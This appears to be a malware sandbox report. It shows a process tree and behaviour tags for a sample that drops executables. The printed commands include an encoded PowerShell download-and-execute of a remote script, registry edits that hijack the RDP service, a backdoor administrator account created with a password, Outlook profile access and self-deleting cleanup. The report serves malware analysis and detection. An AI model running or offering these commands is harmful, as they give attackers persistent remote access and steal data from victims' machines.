1768 wrote to memory of 2680 1768 powershell.exe 93 PID 1768 wrote to memory of 2680 1768 powershell.exe 93 PID 1768 wrote to memory of 676 1768 powershell.exe 96 PID 1768 wrote to memory of 676 1768 powershell.exe 96 PID 2208 wrote to memory of 2332 2208 powershell.exe 97 PID 2208 wrote to memory of 2332 2208 powershell.exe 97 PID 2208 wrote to memory of 2332 2208 powershell.exe 97 PID 2332 wrote to memory of 3296 2332 csc.exe 99 PID 2332 wrote to memory of 3296 2332 csc.exe 99 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Office\13.0\Outlook\Profiles\Outlook B18.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2481030822-2828258191-1606198294-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook B18.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:2388 -
C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"C:\Users\Admin\AppData\Local\Temp\8a78f31447361ca0becbdd0e4ebaa630d1f946006c8c7b3bcd022b53c63b4ac9.exe"2⤵
- Checks SCSI registry key(s)
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: MapViewOfSection
PID:3440
-
-
C:\Users\Admin\AppData\Local\Temp\B18.exeC:\Users\Admin\AppData\Local\Temp\B18.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Accesses Microsoft Outlook accounts
- Accesses Microsoft Outlook profiles
- outlook_office_path
- outlook_win_path
PID:2116 -
C:\Windows\SysWOW64\cmd.execmd.exe /C timeout /T 10 /NOBREAK > Nul & Del /f /q "C:\Users\Admin\AppData\Local\Temp\B18.exe"2⤵PID:600
-
C:\Windows\SysWOW64\timeout.exetimeout /T 10 /NOBREAK3⤵
- Delays execution with timeout.exe
PID:908
-
-
-
C:\Users\Admin\AppData\Local\Temp\1097.exeC:\Users\Admin\AppData\Local\Temp\1097.exe1⤵
- Executes dropped EXE
- Loads dropped DLL
- Checks processor information in registry
- Suspicious use of WriteProcessMemory
PID:2120 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /c taskkill /im 1097.exe /f & timeout /t 6 & del /f /q "C:\Users\Admin\AppData\Local\Temp\1097.exe" & del C:\ProgramData\*.dll & exit2⤵
- Suspicious use of WriteProcessMemory
PID:1732 -
C:\Windows\SysWOW64\taskkill.exetaskkill /im 1097.exe /f3⤵
- Kills process with taskkill
- Suspicious use of AdjustPrivilegeToken
PID:4004
-
-
C:\Windows\SysWOW64\timeout.exetimeout /t 63⤵
- Delays execution with timeout.exe
PID:2424
-
-
-
C:\Users\Admin\AppData\Local\Temp\252A.exeC:\Users\Admin\AppData\Local\Temp\252A.exe1⤵
- Executes dropped EXE
PID:340
-
C:\Users\Admin\AppData\Local\Temp\343E.exeC:\Users\Admin\AppData\Local\Temp\343E.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:1376 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1768 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2abndmrr\2abndmrr.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2856 -
C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6453.tmp" "c:\Users\Admin\AppData\Local\Temp\2abndmrr\CSCEB26CC7B85464880AE1BD15E51835B71.TMP"4⤵PID:3796
-
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2680
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵
- Suspicious use of AdjustPrivilegeToken
PID:676
-
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:1204
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1420
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:1680
-
-
C:\Windows\system32\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:2476
-
-
C:\Windows\system32\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:1160
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:3836
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:4036
-
C:\Windows\system32\cmd.execmd /c net start rdpdr4⤵PID:1700
-
C:\Windows\system32\net.exenet start rdpdr5⤵PID:1240
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:2632
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:2492
-
C:\Windows\system32\cmd.execmd /c net start TermService4⤵PID:2680
-
C:\Windows\system32\net.exenet start TermService5⤵PID:2256
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3784
-
-
-
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:3572
-
-
C:\Windows\system32\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:2544
-
-
-
C:\Users\Admin\AppData\Local\Temp\398E.exeC:\Users\Admin\AppData\Local\Temp\398E.exe1⤵
- Executes dropped EXE
PID:3600
-
C:\Users\Admin\AppData\Local\Temp\4065.exeC:\Users\Admin\AppData\Local\Temp\4065.exe1⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:3252
-
C:\Users\Admin\AppData\Local\Temp\4B72.exeC:\Users\Admin\AppData\Local\Temp\4B72.exe1⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2236 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"powershell.exe" -ep bypass & 'C:\Users\Admin\AppData\Local\Temp\\ready.ps1'2⤵
- Drops file in System32 directory
- Drops file in Windows directory
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2208 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\2zhwhakk\2zhwhakk.cmdline"3⤵
- Suspicious use of WriteProcessMemory
PID:2332 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES80F4.tmp" "c:\Users\Admin\AppData\Local\Temp\2zhwhakk\CSC290AEA82CDEF41E2AE75F62B4FAF47A1.TMP"4⤵PID:3296
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2284
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2544
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:1160
-
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:3156
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV14⤵PID:908
-
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:1160
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:688
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:1124
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:1248
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:828
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2424
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:4004
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:2160
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:3672
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:1856
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:980
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:1260
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:1952
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:360
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:4032
-
-
-
C:\Users\Admin\AppData\Local\Temp\519E.exeC:\Users\Admin\AppData\Local\Temp\519E.exe1⤵
- Executes dropped EXE
- Suspicious use of SetThreadContext
- Suspicious use of WriteProcessMemory
PID:1724 -
C:\Users\Admin\AppData\Local\Temp\519E.exeC:\Users\Admin\AppData\Local\Temp\519E.exe2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
PID:1816
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc Ghasar4f5 /del1⤵PID:2952
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc Ghasar4f5 /del2⤵PID:1616
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc Ghasar4f5 /del3⤵PID:1780
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc U5jzqueS /add1⤵PID:1396
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc U5jzqueS /add2⤵PID:3520
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc U5jzqueS /add3⤵PID:676
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵PID:2252
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:980
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3972
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD1⤵PID:2132
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD2⤵PID:1976
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" RSSLLXYN$ /ADD3⤵PID:2676
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:1384
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:1632
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:600
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc U5jzqueS1⤵PID:888
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc U5jzqueS2⤵PID:908
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc U5jzqueS3⤵PID:2856
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:2304
-
C:\Windows\System32\Conhost.exe\??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV12⤵PID:1780
-
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵
- Modifies data under HKEY_USERS
PID:880
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:676
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵PID:4032
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:1248
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:3916
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:2252
-
-